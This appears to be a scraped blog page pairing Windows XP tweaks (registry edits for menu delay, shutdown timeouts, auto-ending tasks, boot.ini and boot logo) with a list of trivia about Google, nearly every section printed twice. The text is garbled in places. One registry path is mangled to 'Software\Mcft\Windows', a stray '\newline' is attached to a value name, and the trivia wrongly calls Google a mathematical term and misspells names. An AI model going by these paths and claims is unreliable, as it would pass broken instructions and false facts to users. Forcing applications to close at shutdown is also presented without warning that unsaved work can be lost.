If you do not want any folders to appear in common Open dialog boxes,you can do that as well. In HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ comdlg32, create a new DWORD value called NoPlacesBar and give it a value of 1. Exit the Registry. If you want the folders back, either delete NoPlacesBar or give it a value of 0.
Re-Title Internet Explorer
By default, Internet Explorer's title bar shows the name of the Web site you 're viewing, followed by "Microsoft Internet Explorer"--or in some cases, your company's name or the name of the ISP that supplied the browser. To change the repeating text in IE's title bar (or to get rid of it altogether), navigate to and select HKEY_CURRENT_USER\ Software\ Microsoft\Internet Explorer\Main in the Registry Editor, and double-click the Window Title icon in the right pane. (If you don't see this icon, right-click in the pane, choose New, String Value, type Window Title, and press .) Type what you want to see on IE's title bar, or type nothing to show only the site name. Note that the hyphen that normally separates the site name from the page title will remain. When you relaunch Internet Explorer, you will see the change.
Quick Start For Start Menu
A simple Registry tweak can give speed up your start menu and sub-menus. Open the Registry Editor, and navigate to and select:
HKEY_CURRENT_USER\Control Panel\Desktop .
Double-click the MenuShowDelay icon on the right, and change 'Value data' from its default of 400 (milliseconds) to something speedier, like 0. When you have finished, press Enter.
HKEY_CURRENT_USER\Control Panel\Desktop .
Double-click the MenuShowDelay icon on the right, and change 'Value data' from its default of 400 (milliseconds) to something speedier, like 0. When you have finished, press Enter.
Stop Noise While Burning CDs
When using 3rd party burning software (eg, Nero ) to copy audio CD,some noise may be heard at the end of each track. To prevent this,try the following method:
1. Enter System Properties\device manager
2. Select IDE ATA/ATAPI controllers
3. Double click on thee CD writer IDE channel
4. Select advance setting
5. Change the transfer mode to 'PIO Only'
6. Restart Computer
1. Enter System Properties\device manager
2. Select IDE ATA/ATAPI controllers
3. Double click on thee CD writer IDE channel
4. Select advance setting
5. Change the transfer mode to 'PIO Only'
6. Restart Computer
Speed Up the Dual-Boot Timeout
If you dual-boot your computer with Windows XP and another operating system, you see an operating system selection menu on startup. If you typically boot into Windows XP and not the other operating system, you can speed up the dual-boot timeout value so that you do not wait so long for the boot process to select your default operating system and continue with the boot process. The default timeout value is 30 seconds but you can change this setting to 10. This gives you enough time to select the alternate operating system if you want but also speeds up the boot process. You can skip this section if you do not use a dual-boot configuration.
Follow these steps:
1. Locate the boot.ini file on your computer. It is a hidden file by default; mine is located in C:\boot.ini.
2. Open the file with Notepad (which is what opens it by default).
3. Change the Timeout value to 10.
4. Select File/Save and close Notepad.
Follow these steps:
1. Locate the boot.ini file on your computer. It is a hidden file by default; mine is located in C:\boot.ini.
2. Open the file with Notepad (which is what opens it by default).
3. Change the Timeout value to 10.
4. Select File/Save and close Notepad.
Disabling the Boot Logo in WinXP
You can remove the boot logo that appears when you start Windows XP. This little tweak probably shaves only a few seconds off your boot time but seconds count if you are serious about trying to get Windows XP up and running as quickly as possible. The only negative is that if you remove the boot logo, you will also not see any boot messages, such as check disk.
To remove the boot logo, follow these steps:
1. Select Start/Run, type msconfig, and click OK.
2. In the System Configuration Utility, click the BOOT.INI tab.
3. On the BOOT.INI tab, click the NOGUIBOOT check box option. Click OK.
To remove the boot logo, follow these steps:
1. Select Start/Run, type msconfig, and click OK.
2. In the System Configuration Utility, click the BOOT.INI tab.
3. On the BOOT.INI tab, click the NOGUIBOOT check box option. Click OK.
Disabling Recent Documents History
The bad thing about Recent Documents History is that Windows XP has to calculate what should be put there each time you boot Windows, which can slow things down.
1. Open the Registry Editor (select Start/Run, type regedit, and click OK).
2. Navigate to HKEY_CURRENT_USER\Software\Mcft\Windows\ CurrentVersion\Policies\Explorer.
3. Create a NoRecentDocsHistory D_WORD key. Double-click the value to open it once it is created.
4. Set the Data Value to 1 to enable the restriction.
5. Click OK and close the Registry Editor. You'll need to restart the computer for the change to take effect.
1. Open the Registry Editor (select Start/Run, type regedit, and click OK).
2. Navigate to HKEY_CURRENT_USER\Software\Mcft\Windows\ CurrentVersion\Policies\Explorer.
3. Create a NoRecentDocsHistory D_WORD key. Double-click the value to open it once it is created.
4. Set the Data Value to 1 to enable the restriction.
5. Click OK and close the Registry Editor. You'll need to restart the computer for the change to take effect.
Reducing the ShutDown Wait Time
When you start to shut down Windows XP, it has to quit, or "kill," any live applications or processes that are currently running. So close all applications first. However, some applications and processes are always running in the background. You can reduce the amount of time that Windows XP waits for those applications and processes to close before Windows XP kills them.
1. Open registry editor
2. Navigate to HKEY_USERS\.DEFAULT\Control Panel\Desktop. Set the WaitToKillAppTimeout and set the value to 1000. Select the HungAppTimeout\newline value and set it to 1000 as well.
3. Navigate to HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control. Select the WaitToKillServiceTimeout value and set it to 10000.
4. Close the Registry Editor.
1. Open registry editor
2. Navigate to HKEY_USERS\.DEFAULT\Control Panel\Desktop. Set the WaitToKillAppTimeout and set the value to 1000. Select the HungAppTimeout\newline value and set it to 1000 as well.
3. Navigate to HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control. Select the WaitToKillServiceTimeout value and set it to 10000.
4. Close the Registry Editor.
Automatically Killing Tasks on Shutdown
You start to shut down the computer, you wait a few moments, and then you see a dialog box asking if you want to kill an application or service that is running. Instead of prompting you, you can make Windows XP take care of the kill task automatically. Here's how:
1. Open the Registry Editor.
2. Navigate to HKEY_CURRENT_USER\Control Panel\Desktop.
3. Highlight the value AutoEndTasks and change the value to 1.
4. Close the Registry Editor.
1. Open the Registry Editor.
2. Navigate to HKEY_CURRENT_USER\Control Panel\Desktop.
3. Highlight the value AutoEndTasks and change the value to 1.
4. Close the Registry Editor.
20 interesting facts about Google
This is not a trick; but its a useful information that i founded, and like it to share with you all.
1. Google started in January, 1996 as a research project at Stanford University, by Ph.D. candidates Larry Page and Sergey Brin when they were 24 years old and 23 years old respectively.
2. The prime reason the Google home page is so bare is due to the fact that the founders didn’t know HTML and just wanted a quick interface. In fact it was noted that the submit button was a long time coming and hitting the RETURN key was the only way to burst Google into life.
3. Google is a mathematical term 1 followed by one hundred zeroes. The term was coined by Milton Sirotta, nephew of American mathematician Edward Kasne.
4. Gmail was used internally for nearly 2 ears prior to launch to the public. They discovered there was approximately 6 types of email users, and Gmail has been designed to accommodate these 6.
5. It consisted of over 450,000 servers, racked up in clusters located in data centers around the world.
6. The Google search engine receives about a billion search requests per day.
7. Google's index of web pages is the largest in the world, comprising of eight billions(2005) of web pages. Google searches this immense collection of web pages often in less than half a second.
8. Google has a tradition of creating April Fool's Day jokes - such as Google MentalPlex, which allegedly featured the use of mental power to search the web. Some thought the announcement of Gmail in 2004 around April Fool's Day was a joke.
9. Google receives daily search requests from all over the world, including Antarctica.
10. Users can restrict their searches for content in 35 non-English languages. To date, no requests have been received from beyond the earth's orbit, but Google has a Klingon interface just in case.
11. Google has a world-class staff of 9,378 full-time employees known as Googlers. The company headquarters is called the Googleplex located at Mountain View at 1600 Amphitheatre Parkway.
12. Google translates billions of HTML web pages into a display format for WAP and i-mode phones and wireless handheld devices.
13. "I feel lucky" is nearly never used. It was a comfort button which actually takes to the first web page returned by the search results.
14. Google use the unique 20%/5% rules. That is ,if at least 20% of people use a feature, then it will be included. At least 5% of people need to use a particular search preference before it will make it into the 'Advanced Preferences'.
15. Employees in Google are encouraged to use 20% of their time working on their own projects. That's why we have GMail,Google News and Orkut now.
16. Google Groups comprises more than 845 million Usenet messages, which is the world's largest collection of messages or the equivalent of more than a terabyte of human conversation.
17. The basis of Google's search technology is called PageRank™, and assigns an "importance" value to each page on the web and gives it a rank to determine how useful it is. However, that's not why it's called PageRank. It's actually named after Google co-founder Larry Page.
18. Googlers are multifaceted. One operations manager, who keeps the Google network in good health is a former neurosurgeon. One software engineer is a former rocket scientist. And the company's chef formerly prepared meals for members of The Grateful Dead and funkmeister George Clinton.
19.Google’s Orkut is very popular in Brazil and India. It was the brainchild of a Google engineer who was given free reign to run with it.
20. In a 2006 report of the world's richest people, Forbes reported that Sergey Brin was #26 with a net worth of $12.9 billion, and Larry Page was #27 with a net worth of $12.8 billion
1. Google started in January, 1996 as a research project at Stanford University, by Ph.D. candidates Larry Page and Sergey Brin when they were 24 years old and 23 years old respectively.
2. The prime reason the Google home page is so bare is due to the fact that the founders didn’t know HTML and just wanted a quick interface. In fact it was noted that the submit button was a long time coming and hitting the RETURN key was the only way to burst Google into life.
3. Google is a mathematical term 1 followed by one hundred zeroes. The term was coined by Milton Sirotta, nephew of American mathematician Edward Kasne.
4. Gmail was used internally for nearly 2 ears prior to launch to the public. They discovered there was approximately 6 types of email users, and Gmail has been designed to accommodate these 6.
5. It consisted of over 450,000 servers, racked up in clusters located in data centers around the world.
6. The Google search engine receives about a billion search requests per day.
7. Google's index of web pages is the largest in the world, comprising of eight billions(2005) of web pages. Google searches this immense collection of web pages often in less than half a second.
8. Google has a tradition of creating April Fool's Day jokes - such as Google MentalPlex, which allegedly featured the use of mental power to search the web. Some thought the announcement of Gmail in 2004 around April Fool's Day was a joke.
9. Google receives daily search requests from all over the world, including Antarctica.
10. Users can restrict their searches for content in 35 non-English languages. To date, no requests have been received from beyond the earth's orbit, but Google has a Klingon interface just in case.
11. Google has a world-class staff of 9,378 full-time employees known as Googlers. The company headquarters is called the Googleplex located at Mountain View at 1600 Amphitheatre Parkway.
12. Google translates billions of HTML web pages into a display format for WAP and i-mode phones and wireless handheld devices.
13. "I feel lucky" is nearly never used. It was a comfort button which actually takes to the first web page returned by the search results.
14. Google use the unique 20%/5% rules. That is ,if at least 20% of people use a feature, then it will be included. At least 5% of people need to use a particular search preference before it will make it into the 'Advanced Preferences'.
15. Employees in Google are encouraged to use 20% of their time working on their own projects. That's why we have GMail,Google News and Orkut now.
16. Google Groups comprises more than 845 million Usenet messages, which is the world's largest collection of messages or the equivalent of more than a terabyte of human conversation.
17. The basis of Google's search technology is called PageRank™, and assigns an "importance" value to each page on the web and gives it a rank to determine how useful it is. However, that's not why it's called PageRank. It's actually named after Google co-founder Larry Page.
18. Googlers are multifaceted. One operations manager, who keeps the Google network in good health is a former neurosurgeon. One software engineer is a former rocket scientist. And the company's chef formerly prepared meals for members of The Grateful Dead and funkmeister George Clinton.
19.Google’s Orkut is very popular in Brazil and India. It was the brainchild of a Google engineer who was given free reign to run with it.
20. In a 2006 report of the world's richest people, Forbes reported that Sergey Brin was #26 with a net worth of $12.9 billion, and Larry Page was #27 with a net worth of $12.8 billion
Subscribe to:
Posts (Atom)